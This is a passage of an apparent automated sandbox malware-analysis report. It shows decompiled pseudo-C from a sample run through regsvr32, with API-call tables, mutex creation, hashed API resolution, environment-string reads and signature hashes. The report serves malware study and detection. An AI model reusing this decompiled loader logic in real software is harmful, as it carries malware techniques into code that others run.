                          				 *(_t160 + 0x38) = 0x26f1;
                          				 *(_t160 + 0x30) = 0x1000;
                          				 *((long long*)(_t160 + 0x28)) = 0x1acd;
                          				 *((long long*)(_t160 + 0x20)) = 0x1f1c;
                          				 *0x8c0b4160 = E00007FF87FF88C08F8F0(_t93, _t108 & 0x00003189, _t93 - (_t154 + _t171 | _t105), ( *(__rdx + 0x1f0) ^  *(__rdx + 0x100)) + r9d,  *((intOrPtr*)(_t160 + 0x70)), _t108, _t163, _t165);
                          				r15d = r15d ^ r13d &  *(_t170 + 0x188);
                          				 *(_t170 + 0xb0) = r8d |  *(_t170 + 0xd8);
                          				if (_t93 + 3 - (_t154 + _t171 | _t105) <= 0) goto 0x8c072cf0;
                          				return _t171 + 0x1f2c;
                          			}
























                          0x7ff88c072a83
                          0x7ff88c072a8b
                          0x7ff88c072aa0
                          0x7ff88c072aa8
                          0x7ff88c072aaf
                          0x7ff88c072ab6
                          0x7ff88c072abe
                          0x7ff88c072ac1
                          0x7ff88c072ad0
                          0x7ff88c072ad6
                          0x7ff88c072add
                          0x7ff88c072aea
                          0x7ff88c072af8
                          0x7ff88c072aff
                          0x7ff88c072b06
                          0x7ff88c072b0b
                          0x7ff88c072b1a
                          0x7ff88c072b28
                          0x7ff88c072b35
                          0x7ff88c072b40
                          0x7ff88c072b46
                          0x7ff88c072b4d
                          0x7ff88c072b54
                          0x7ff88c072b5b
                          0x7ff88c072b62
                          0x7ff88c072b86
                          0x7ff88c072b8e
                          0x7ff88c072b94
                          0x7ff88c072ba1
                          0x7ff88c072bb5
                          0x7ff88c072bca
                          0x7ff88c072bd4
                          0x7ff88c072bd9
                          0x7ff88c072bde
                          0x7ff88c072be3
                          0x7ff88c072be7
                          0x7ff88c072bf5
                          0x7ff88c072bff
                          0x7ff88c072c03
                          0x7ff88c072c08
                          0x7ff88c072c0c
                          0x7ff88c072c11
                          0x7ff88c072c16
                          0x7ff88c072c1c
                          0x7ff88c072c22
                          0x7ff88c072c32
                          0x7ff88c072c61
                          0x7ff88c072c7b
                          0x7ff88c072c82
                          0x7ff88c072c85
                          0x7ff88c072c8d
                          0x7ff88c072cae
                          0x7ff88c072ccb
                          0x7ff88c072cd1
                          0x7ff88c072cdd
                          0x7ff88c072ce6
                          0x7ff88c072cf0
                          0x7ff88c072cfe
                          0x7ff88c072d0c
                          0x7ff88c072d15
                          0x7ff88c072d1b
                          0x7ff88c072d24
                          0x7ff88c072d2a
                          0x7ff88c072d33
                          0x7ff88c072d3c
                          0x7ff88c072d45
                          0x7ff88c072d59
                          0x7ff88c072d6a
                          0x7ff88c072d77
                          0x7ff88c072d86
                          0x7ff88c072dad

                          APIs
                          • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF88C07906E), ref: 00007FF88C072C61
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.389521559.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000003.00000002.389503061.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389771313.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389956635.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389983202.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390104358.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390153087.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff88c070000_regsvr32.jbxd
                          Similarity
                          • API ID: HeapProcess
                          • String ID: /.$C'$-
                          • API String ID: 54951025-1702015707
                          • Opcode ID: 672deff062b64fbc16a2a7a10c4d6b86e45e16b49530db53f8233d17ed392130
                          • Instruction ID: 9c7a84dd35a83a2604f00d6349f8973aef6061ce686c901b9d6d4753d9879d53
                          • Opcode Fuzzy Hash: 672deff062b64fbc16a2a7a10c4d6b86e45e16b49530db53f8233d17ed392130
                          • Instruction Fuzzy Hash: FF71AB72A086D6C6EB24CB04E498BEEB7A8F784788F014135DF8D47B58DB78E595CB40
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 331 3da7a0-3da7eb call 3d908c 334 3da7ed-3da802 ConvertStringSecurityDescriptorToSecurityDescriptorW 331->334 335 3da804 331->335 336 3da806-3da808 334->336 335->336 337 3da80e-3da848 call 3d1000 336->337 338 3da8d2-3da8e7 336->338 337->338 341 3da84e-3da85f call 3d908c 337->341 344 3da875 341->344 345 3da861-3da873 CreateMutexW 341->345 346 3da878-3da87b 344->346 345->346 347 3da87d-3da88e call 3d908c 346->347 348 3da8c4-3da8cc HeapFree 346->348 351 3da894 347->351 352 3da890-3da892 347->352 348->338 353 3da899-3da89e 351->353 352->353 355 3da8ba-3da8bf 353->355 356 3da8a0-3da8b1 call 3d908c 353->356 355->348 356->348 359 3da8b3-3da8b8 FindCloseChangeNotification 356->359 359->348
                          C-Code - Quality: 30%
                          			E003DA7A0(long long* __rax, long long __rbx, intOrPtr* __rcx, void* __r9) {
                          				void* __rsi;
                          				void* __rbp;
                          				void* _t24;
                          				intOrPtr _t26;
                          				void* _t29;
                          				void* _t30;
                          				void* _t33;
                          				intOrPtr _t36;
                          				void* _t37;
                          				long long* _t55;
                          				long long* _t56;
                          				long long _t57;
                          				intOrPtr _t70;
                          				long long _t72;
                          				void* _t80;
                          				void* _t81;
                          				intOrPtr* _t89;
                          
                          				_t57 = __rbx;
                          				_t55 = __rax;
                          				 *((long long*)(_t80 + 8)) = __rbx;
                          				_t81 = _t80 - 0x50;
                          				_t74 =  *0x3dd458;
                          				_t70 =  *0x3dd448;
                          				_t89 = __rcx;
                          				 *((intOrPtr*)(_t81 + 0x30)) = 0x18;
                          				_t36 = 0;
                          				 *((intOrPtr*)(_t81 + 0x40)) = 0;
                          				E003D908C(_t24, 0xe9f8f8df,  *((intOrPtr*)( *0x3dd458 + 0x20)));
                          				if(_t55 == __rbx) {
                          					_t26 = 0;
                          				} else {
                          					r9d = 0; // executed
                          					_t26 =  *_t55(); // executed
                          				}
                          				if(_t26 != _t36) {
                          					r9d = 0;
                          					 *((intOrPtr*)(_t81 + 0x88)) =  *_t89;
                          					_t56 = _t81 + 0x90;
                          					 *((long long*)(_t81 + 0x20)) = _t56;
                          					_t29 = E003D1000(_t36, _t37, _t56, _t57, _t81 + 0x88, _t74, 0x3d0000, _t70 + 0x3e1178);
                          					if(_t56 != _t57) {
                          						_t30 = E003D908C(_t29, 0x3ff22481,  *((intOrPtr*)(_t74 + 0x18)));
                          						if(_t56 == _t57) {
                          							_t72 = _t57;
                          						} else {
                          							_t30 = CreateMutexW(); // executed
                          							_t72 = _t56;
                          						}
                          						if(_t72 != _t57) {
                          							E003D908C(_t30, 0xc06f8334,  *((intOrPtr*)(_t74 + 0x18)));
                          							if(_t56 == _t57) {
                          								_t33 = 0x7f;
                          							} else {
                          								_t33 =  *_t56();
                          							}
                          							if(_t33 != 0xb7) {
                          								 *((long long*)(_t89 + 0x18)) = _t72;
                          								_t36 = 1;
                          							} else {
                          								E003D908C(_t33, 0xa219a077,  *((intOrPtr*)(_t74 + 0x18)));
                          								if(_t56 != _t57) {
                          									FindCloseChangeNotification(); // executed
                          								}
                          							}
                          						}
                          						HeapFree();
                          					}
                          				}
                          				return _t36;
                          			}




















                          0x003da7a0
                          0x003da7a0
                          0x003da7a0
                          0x003da7ac
                          0x003da7b0
                          0x003da7b7
                          0x003da7be
                          0x003da7c5
                          0x003da7cd
                          0x003da7cf
                          0x003da7dc
                          0x003da7eb
                          0x003da804
                          0x003da7ed
                          0x003da7fd
                          0x003da800
                          0x003da800
                          0x003da808
                          0x003da812
                          0x003da81d
                          0x003da824
                          0x003da838
                          0x003da83d
                          0x003da848
                          0x003da857
                          0x003da85f
                          0x003da875
                          0x003da861
                          0x003da86e
                          0x003da870
                          0x003da870
                          0x003da87b
                          0x003da886
                          0x003da88e
                          0x003da894
                          0x003da890
                          0x003da890
                          0x003da890
                          0x003da89e
                          0x003da8ba
                          0x003da8bf
                          0x003da8a0
                          0x003da8a9
                          0x003da8b1
                          0x003da8b6
                          0x003da8b6
                          0x003da8b1
                          0x003da89e
                          0x003da8cc
                          0x003da8cc
                          0x003da848
                          0x003da8e7

                          APIs
                            • Part of subcall function 003D908C: SetLastError.KERNEL32 ref: 003D90C8
                          • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 003DA800
                          • CreateMutexW.KERNELBASE ref: 003DA86E
                          • FindCloseChangeNotification.KERNELBASE ref: 003DA8B6
                          • HeapFree.KERNEL32 ref: 003DA8CC
                          Memory Dump Source
                          • Source File: 00000003.00000002.389034131.00000000003D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_3d0000_regsvr32.jbxd
                          Similarity
                          • API ID: DescriptorSecurity$ChangeCloseConvertCreateErrorFindFreeHeapLastMutexNotificationString
                          • String ID:
                          • API String ID: 2727274001-0
                          • Opcode ID: 094b80e17cbc27acdaa4bcb602713c3cf38535d7203a15ce1a2febed987810e0
                          • Instruction ID: ae3f971aed6915ae58291f5bb47a450341dbb2351e3e2079d14e01ad7e709835
                          • Opcode Fuzzy Hash: 094b80e17cbc27acdaa4bcb602713c3cf38535d7203a15ce1a2febed987810e0
                          • Instruction Fuzzy Hash: 9231A133704A859ADB22EF52F54079AB7A0F788784F484823AF4E47705DE38D58AD752
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          APIs
                          • GetEnvironmentStringsW.KERNELBASE(?,?,?,?,?,?,?,00007FF88C07D8CF), ref: 00007FF88C080A59
                          • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF88C07D8CF), ref: 00007FF88C080ABB
                          • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF88C07D8CF), ref: 00007FF88C080AF5
                          • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF88C07D8CF), ref: 00007FF88C080B1F
                          Memory Dump Source
                          • Source File: 00000003.00000002.389521559.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000003.00000002.389503061.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389771313.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389956635.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389983202.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390104358.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390153087.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff88c070000_regsvr32.jbxd
                          Similarity
                          • API ID: ByteCharEnvironmentMultiStringsWide$Free
                          • String ID:
                          • API String ID: 1557788787-0
                          • Opcode ID: ef2e6b779f9dc2e69840adeab8782f97473b4efd568450990a456c347f97633f
                          • Instruction ID: f2fc2ac83be0fb9f6078adaba92fb868221eb327f7e01f7ff60d07e042cf903b
                          • Opcode Fuzzy Hash: ef2e6b779f9dc2e69840adeab8782f97473b4efd568450990a456c347f97633f
                          • Instruction Fuzzy Hash: A2213231F19B9581EE748F12F840129A6E4FB55FD8B189135DA9E63BA8DF3CE452C700
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 35%
                          			E00007FF87FF88C089F80(intOrPtr __ecx, void* __edx, void* __rax, long long __rbx, void* __rcx, void* __rdx, void* __r8, void* __r9, void* __r10, void* __r11) {
                          				void* __rdi;
                          				void* __rbp;
                          				void* __r12;
                          				signed short _t143;
                          				signed int _t145;
                          				signed int _t199;
                          				signed int _t205;
                          				intOrPtr _t206;
                          				signed int _t209;
                          				signed int _t211;
                          				signed short* _t239;
                          				void* _t241;
                          				signed long long _t242;
                          				void* _t246;
                          				signed long long _t248;
                          				void* _t250;
                          				CHAR* _t253;
                          				void* _t256;
                          				void* _t258;
                          				void* _t259;
                          				signed short* _t262;
                          				void* _t267;
                          				void* _t271;
                          				void* _t273;
                          				void* _t275;
                          				void* _t277;
                          
                          				_t267 = __r10;
                          				_t265 = __r9;
                          				_t246 = __rdx;
                          				_t241 = __rcx;
                          				 *((long long*)(_t258 + 0x18)) = __rbx;
                          				 *(_t258 + 0x20) = r9d;
                          				 *((intOrPtr*)(_t258 + 8)) = __ecx;
                          				_t259 = _t258 - 0x90;
                          				r12d =  *(_t259 + 0x100);
                          				r10d = __rdx + 0x354;
                          				_t239 =  *((intOrPtr*)(_t259 + 0xf0));
                          				r15d = r9d;
                          				 *(_t259 + 0x74) = __rdx - 0x3595;
                          				r13d = __rax - 0x228c;
                          				 *(_t259 + 0xf8) = __edx + 0xfffff21d;
                          				r11d = _t271 + 0x14c1;
                          				 *((intOrPtr*)(_t259 + 0x78)) =  *(_t259 + 0xf8) + 0x522;
                          				r14d = _t277 - 0x12f1;
                          				 *(_t259 + 0x7c) = r11d;
                          				 *(_t259 + 0x108) = _t277 - 0x145b;
                          				 *(_t259 + 0x80) = r14d;
                          				r9d = __rax - 0x11a9;
                          				r8d = __rax - 0x923;
                          				 *(_t259 + 0xd8) = r9d;
                          				 *(_t259 + 0x70) = r8d;
                          				_t206 = __rax - 0x11a9;
                          				 *((intOrPtr*)(_t259 + 0x84)) = _t206;
                          				 *(_t259 + 0x110) = __rax + 0x984;
                          				if (r14d - _t256 + 0x106 < 0) goto 0x8c08a261;
                          				if (r15d == _t275 + 0x1663) goto 0x8c08a261;
                          				_t239[0xac] = _t239[0x11e];
                          				r10d = r10d - 0x283;
                          				r8d = 0x343a;
                          				r9d = 0x329d;
                          				 *(_t259 + 0x88) = r10d;
                          				 *(_t259 + 0x50) = 0x8c0a8090;
                          				 *(_t259 + 0x48) = 0x7d;
                          				 *(_t259 + 0x40) = 0x1a;
                          				 *(_t259 + 0x38) =  *((intOrPtr*)(_t239[0xe4] + 0x130)) - 0x23ef;
                          				 *(_t259 + 0x30) = 0x1e0;
                          				 *(_t259 + 0x28) = 0x3666;
                          				 *(_t259 + 0x20) = _t239;
                          				_t143 = E00007FF87FF88C08F290(0x27ae, 0x343a, _t239, _t250, __r8, __r9, _t277, _t275, _t273, _t271, _t250);
                          				r9d =  *(_t259 + 0xf8);
                          				r8d =  *(_t259 + 0x110);
                          				r11d = _t253 - 0x1956;
                          				r12d = _t250 + 0x1309;
                          				r10d = _t273 + 0x23f6;
                          				r14d = _t273 + 0x30d5;
                          				_t239[0x11e] = _t143;
                          				 *((intOrPtr*)(_t259 + 0x68)) = _t256 + 0x19bd;
                          				 *((intOrPtr*)(_t259 + 0x60)) = _t250 + 0x165d;
                          				r15d = r15d + 0xfffffbb6;
                          				 *(_t259 + 0x58) = r10d;
                          				r9d = r9d + 0xfffffc44;
                          				 *(_t259 + 0x50) = r11d;
                          				r8d = r8d + 0xfffff9e1;
                          				 *(_t259 + 0x48) =  *(_t259 + 0x74) + 0x3189;
                          				 *(_t259 + 0x40) =  *((intOrPtr*)(_t259 + 0x78)) + 0x9db;
                          				 *(_t259 + 0x38) = _t206 + 0x1669;
                          				 *(_t259 + 0x30) = r14d;
                          				 *(_t259 + 0x28) = _t239;
                          				 *(_t259 + 0x20) = r15d;
                          				_t145 = E00007FF87FF88C0790B0(0x8c0a8090, _t239, _t241, _t246, __r8, __r11);
                          				r14d =  *(_t259 + 0x80);
                          				r8d =  *(_t259 + 0x74);
                          				r11d =  *(_t259 + 0x108);
                          				r8d = r8d + 0x27b2;
                          				r9d =  *(_t259 + 0x70);
                          				r11d =  &(r11d[0x9ed]);
                          				r10d = _t275 + 0x119f;
                          				 *(_t259 + 0xf8) = _t145;
                          				r9d = r9d + 0xfffff951;
                          				 *(_t259 + 0x48) = _t273 + 0x38e9;
                          				 *(_t259 + 0x40) = r8d;
                          				_t262 = _t239;
                          				 *(_t259 + 0x38) = r12d;
                          				 *(_t259 + 0x30) = r10d;
                          				 *(_t259 + 0x28) = r11d;
                          				 *(_t259 + 0x20) =  *((intOrPtr*)(_t259 + 0x78)) + 0xf39;
                          				E00007FF87FF88C072390(0x8c0a8090, _t239, _t241, _t246, _t262, _t265, _t271); // executed
                          				r8d =  *(_t259 + 0x70);
                          				r9d =  *(_t259 + 0xd8);
                          				r12d =  *(_t259 + 0x100);
                          				r15d =  *(_t259 + 0xe8);
                          				r11d =  *(_t259 + 0x7c);
                          				r10d =  *(_t259 + 0x88);
                          				if (r12d - _t273 + 0x27b2 >= 0) goto 0x8c08a3c0;
                          				if (r13d - _t271 + 0x216 >= 0) goto 0x8c08a31a;
                          				r11d = _t250 + 0x526;
                          				r10d = _t262 - 0x526;
                          				 *((intOrPtr*)(_t259 + 0x60)) = _t267 - 0x3c9;
                          				_t205 =  &(_t262[0x644]);
                          				 *(_t259 + 0x58) = r10d;
                          				r15d = _t241 + 0x11ae;
                          				 *(_t259 + 0x50) = r11d;
                          				_t199 =  *((intOrPtr*)(_t259 + 0xd0)) + 0x44a;
                          				 *(_t259 + 0x48) = _t239;
                          				_t209 =  *((intOrPtr*)(_t259 + 0x84)) + 0x4ca;
                          				 *(_t259 + 0x40) = _t199;
                          				r14d = r14d + 0xcdf;
                          				 *(_t259 + 0x38) = _t205;
                          				r9d = r9d + 0x4ca;
                          				 *(_t259 + 0x30) = _t209;
                          				r8d = r8d + 0xfffffde6;
                          				 *(_t259 + 0x28) = r14d;
                          				 *(_t259 + 0x20) = r15d;
                          				E00007FF87FF88C0875E0(0x8c0a8090, _t241, _t246);
                          				goto 0x8c08a47d;
                          				_t242 = _t239[0x80];
                          				if (_t242 != ( *(_t259 + 0xd8) + 0x66c) * _t239[0xf0]) goto 0x8c08a340;
                          				_t211 = _t209 & _t239[0xf0] & 0x00003189;
                          				r12d = r12d + _t211;
                          				_t248 = _t239[0x114] & r9d;
                          				if (r13d - _t248 < 0) goto 0x8c08a47d;
                          				if (_t239[0x48] - (r15d | _t242) <= 0) goto 0x8c08a39c;
                          				r12d = r12d - (r15d | 0x000027b2);
                          				 *_t239 =  *_t239 - _t242;
                          				_t239[0x20] = _t239[0x20] - (_t239[0x88] - 0x000023f6 &  *_t239);
                          				goto 0x8c08a3af;
                          				_t239[0xc] = _t239[0xc] ^ _t205 * _t239[0xc4] + _t239[0x3c];
                          				r13d = r13d + 2;
                          				if (r13d - _t248 >= 0) goto 0x8c08a366;
                          				goto 0x8c08a47d;
                          				if (_t239[0x10c] - _t242 >= 0) goto 0x8c08a47d;
                          				r12d =  *(_t259 + 0x70);
                          				asm("o16 nop [eax+eax]");
                          				 *(_t259 + 0x20) = _t239[0x98] | 0x0000228c;
                          				r9d = (_t239[0xa8] & 0x0000ffff) * ( *_t239 & 0x0000ffff) & 0x0000ffff;
                          				r9d = r9d * (r11w & 0xffffffff);
                          				r8d = _t239[0xc4] * r12d * 0x30d5;
                          				CallNamedPipeA(_t253, _t256, ??, ??, ??);
                          				r11d =  *(_t259 + 0x7c);
                          				if (_t199 + 1 - (_t239[0x20] - 0x23f6) * _t211 < 0) goto 0x8c08a3f0;
                          				r12d =  *(_t259 + 0x100);
                          				return _t271 + 0xb3d;
                          			}





























                          0x7ff88c089f80
                          0x7ff88c089f80
                          0x7ff88c089f80
                          0x7ff88c089f80
                          0x7ff88c089f80
                          0x7ff88c089f85
                          0x7ff88c089f8a
                          0x7ff88c089f99
                          0x7ff88c089fad
                          0x7ff88c089fb5
                          0x7ff88c089fbc
                          0x7ff88c089fc4
                          0x7ff88c089fcd
                          0x7ff88c089fd1
                          0x7ff88c089fd8
                          0x7ff88c089fe4
                          0x7ff88c089fec
                          0x7ff88c089ff0
                          0x7ff88c08a005
                          0x7ff88c08a00a
                          0x7ff88c08a011
                          0x7ff88c08a019
                          0x7ff88c08a020
                          0x7ff88c08a027
                          0x7ff88c08a036
                          0x7ff88c08a03b
                          0x7ff88c08a047
                          0x7ff88c08a054
                          0x7ff88c08a05e
                          0x7ff88c08a06e
                          0x7ff88c08a080
                          0x7ff88c08a087
                          0x7ff88c08a095
                          0x7ff88c08a098
                          0x7ff88c08a09e
                          0x7ff88c08a0b3
                          0x7ff88c08a0be
                          0x7ff88c08a0c3
                          0x7ff88c08a0c8
                          0x7ff88c08a0d1
                          0x7ff88c08a0d9
                          0x7ff88c08a0e1
                          0x7ff88c08a0e6
                          0x7ff88c08a0eb
                          0x7ff88c08a0f9
                          0x7ff88c08a101
                          0x7ff88c08a10f
                          0x7ff88c08a11a
                          0x7ff88c08a125
                          0x7ff88c08a12c
                          0x7ff88c08a144
                          0x7ff88c08a14e
                          0x7ff88c08a152
                          0x7ff88c08a159
                          0x7ff88c08a15e
                          0x7ff88c08a165
                          0x7ff88c08a16a
                          0x7ff88c08a171
                          0x7ff88c08a17b
                          0x7ff88c08a182
                          0x7ff88c08a186
                          0x7ff88c08a18b
                          0x7ff88c08a190
                          0x7ff88c08a195
                          0x7ff88c08a19a
                          0x7ff88c08a1a2
                          0x7ff88c08a1a7
                          0x7ff88c08a1af
                          0x7ff88c08a1b6
                          0x7ff88c08a1bb
                          0x7ff88c08a1c9
                          0x7ff88c08a1db
                          0x7ff88c08a1ef
                          0x7ff88c08a1f6
                          0x7ff88c08a200
                          0x7ff88c08a205
                          0x7ff88c08a208
                          0x7ff88c08a20d
                          0x7ff88c08a212
                          0x7ff88c08a217
                          0x7ff88c08a21b
                          0x7ff88c08a220
                          0x7ff88c08a227
                          0x7ff88c08a22f
                          0x7ff88c08a23e
                          0x7ff88c08a24d
                          0x7ff88c08a259
                          0x7ff88c08a26b
                          0x7ff88c08a27c
                          0x7ff88c08a289
                          0x7ff88c08a2a5
                          0x7ff88c08a2ac
                          0x7ff88c08a2b0
                          0x7ff88c08a2b7
                          0x7ff88c08a2bc
                          0x7ff88c08a2c3
                          0x7ff88c08a2c8
                          0x7ff88c08a2ce
                          0x7ff88c08a2d3
                          0x7ff88c08a2d9
                          0x7ff88c08a2dd
                          0x7ff88c08a2e4
                          0x7ff88c08a2e8
                          0x7ff88c08a2ef
                          0x7ff88c08a2f3
                          0x7ff88c08a2fa
                          0x7ff88c08a30b
                          0x7ff88c08a310
                          0x7ff88c08a315
                          0x7ff88c08a31a
                          0x7ff88c08a32f
                          0x7ff88c08a337
                          0x7ff88c08a33d
                          0x7ff88c08a34a
                          0x7ff88c08a353
                          0x7ff88c08a369
                          0x7ff88c08a373
                          0x7ff88c08a390
                          0x7ff88c08a396
                          0x7ff88c08a39a
                          0x7ff88c08a3ab
                          0x7ff88c08a3af
                          0x7ff88c08a3b9
                          0x7ff88c08a3bb
                          0x7ff88c08a3dc
                          0x7ff88c08a3e2
                          0x7ff88c08a3ea
                          0x7ff88c08a41d
                          0x7ff88c08a422
                          0x7ff88c08a42a
                          0x7ff88c08a443
                          0x7ff88c08a44a
                          0x7ff88c08a45e
                          0x7ff88c08a46f
                          0x7ff88c08a475
                          0x7ff88c08a49f

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.389521559.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000003.00000002.389503061.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389771313.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389956635.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389983202.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390104358.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390153087.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff88c070000_regsvr32.jbxd
                          Similarity
                          • API ID: CallNamedPipe
                          • String ID: f6$}
                          • API String ID: 1741058652-3232957126
                          • Opcode ID: cca9b28b80d231eb5616da5a01d49f7b9c90829cfa428a0db1be8c7848e8995e
                          • Instruction ID: f3160b77f50d1c060eb03e7454eff4a5ebd391b80e3aa2ab6cc31718271802d4
                          • Opcode Fuzzy Hash: cca9b28b80d231eb5616da5a01d49f7b9c90829cfa428a0db1be8c7848e8995e
                          • Instruction Fuzzy Hash: 82D17C736196C58BD724CF15E4447EABBA4F388788F148129EB8917B58DB7CEA45CF00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 93%
                          			E00007FF87FF88C074820(long long __rax, long long __rbx, void* __rcx, void* __r8, void* __r9, void* __r10) {
                          				void* __rsi;
                          				void* __rbp;
                          				void* __r13;
                          				void* __r15;
                          				signed int _t132;
                          				signed int _t134;
                          				signed int _t168;
                          				signed int _t183;
                          				signed int _t188;
                          				signed int _t190;
                          				signed int _t200;
                          				signed long long _t217;
                          				signed int _t219;
                          				signed long long _t223;
                          				signed long long _t226;
                          				void* _t235;
                          				void* _t237;
                          				void* _t239;
                          				void* _t241;
                          				void* _t242;
                          				void* _t244;
                          				void* _t247;
                          				void* _t248;
                          				long long _t249;
                          				void* _t251;
                          				void* _t253;
                          				signed int _t254;
                          				void* _t256;
                          				CHAR* _t258;
                          				signed long long _t259;
                          
                          				_t247 = __r10;
                          				_t246 = __r9;
                          				_t244 = __r8;
                          				_t221 = __rcx;
                          				_t218 = __rbx;
                          				 *((long long*)(_t241 + 0x10)) = __rbx;
                          				 *(_t241 + 0x20) = r9d;
                          				_push(_t239);
                          				_push(_t237);
                          				_push(_t235);
                          				_push(_t251);
                          				_push(_t253);
                          				_push(_t256);
                          				_t242 = _t241 - 0x80;
                          				r10d = __r9 - 0x3666;
                          				r12d =  *(_t242 + 0xf8);
                          				r14d = __r9 - 0x22c;
                          				 *(_t242 + 0xc0) = r10d;
                          				r8d =  *(_t242 + 0xe8);
                          				_t9 = _t221 - 0x27b2; // 0x0
                          				r8d = r8d + 0xffffee57;
                          				 *(_t242 + 0xd0) = _t9;
                          				 *(_t242 + 0x68) = r8d;
                          				r9d = __rax + 0x1563;
                          				r12d = r12d + 0x984;
                          				r13d = __rax - 0x2103;
                          				 *(_t242 + 0xe8) = r9d;
                          				_t132 = __r10 + 0x23f6;
                          				 *(_t242 + 0x60) = _t132;
                          				if (r9d - _t132 <= 0) goto 0x8c074ab2;
                          				r8d = _t256 - 0x2b1;
                          				r10d = r10d + 0x37e1;
                          				r11d = _t253 + 0x38e9;
                          				_t254 =  *((intOrPtr*)(_t242 + 0x118));
                          				_t21 = _t239 + 0x2598; // 0x2598
                          				 *(_t242 + 0x48) = _t21;
                          				 *(_t242 + 0x40) = _t235 - 0x44a;
                          				r15d = _t256 - 0x11ae;
                          				 *(_t242 + 0x38) = r8d;
                          				_t27 = _t239 + 0x228c; // 0x228c
                          				r9d = _t27;
                          				 *(_t242 + 0x30) = r10d;
                          				 *(_t242 + 0x28) = r15d;
                          				 *(_t242 + 0x20) = r11d;
                          				_t134 = E00007FF87FF88C08AA10(__rax, __rcx, _t254, __r8, __r9, _t258); // executed
                          				r8d =  *(_t242 + 0xe8);
                          				r10d = _t251 - 0x278;
                          				r12d =  *(_t242 + 0xd0);
                          				_t168 = __rbx - 0x150e;
                          				 *(_t242 + 0x50) = _t168;
                          				r14d = _t134;
                          				 *(_t242 + 0x48) = _t168;
                          				 *(_t242 + 0x40) = _t134 + 0xfffffa6f;
                          				r9d = _t251 + 0x27ae;
                          				r11d = _t237 + 0x189;
                          				 *(_t242 + 0x38) =  *(_t242 + 0x60);
                          				_t200 = _t237 + 0x495;
                          				 *(_t242 + 0x30) = r10d;
                          				 *(_t242 + 0x28) = r11d;
                          				r8d = r8d + 0x283;
                          				 *(_t242 + 0x20) = _t254;
                          				 *(_t242 + 0xf8) = __rbx + 0xf39 - 0x145b;
                          				E00007FF87FF88C077120( *(_t242 + 0x100), __rax, __rcx, _t254, __r8, __r9, _t247, _t248);
                          				LoadLibraryA(_t258);
                          				r10d = __rbx + 0x2ad;
                          				r11d = _t251 + 0x37e1;
                          				 *(_t242 + 0x50) = _t200;
                          				 *((long long*)(_t254 + 0x268)) = __rax;
                          				_t58 = _t237 + 0x1270; // 0x1270
                          				_t188 = _t58;
                          				_t60 = _t256 + 0x81; // 0x81
                          				r8d = _t60;
                          				 *((intOrPtr*)(_t254 + 0x120)) =  *((intOrPtr*)(_t254 + 0x120)) + ( *(_t254 + 0x1e0) | 0x0000343a);
                          				r9d = r15d;
                          				 *(_t242 + 0x48) = _t251 + 0x329d;
                          				 *(_t242 + 0x40) = r10d;
                          				 *(_t242 + 0x38) = r11d;
                          				 *(_t242 + 0x30) = _t235 + 0x1011;
                          				 *(_t242 + 0x28) = _t188;
                          				 *(_t242 + 0x20) = _t254;
                          				E00007FF87FF88C072730( *(_t254 + 0x1e0) | 0x0000343a, __rbx, _t254 + 0x160, _t237, _t244);
                          				r8d =  *(_t242 + 0xd8);
                          				_t71 = _t256 - 0x1270; // -4720
                          				r10d =  *(_t242 + 0xc0);
                          				 *(_t242 + 0x48) = r8d;
                          				_t75 = _t256 - 0xeb4; // -3764
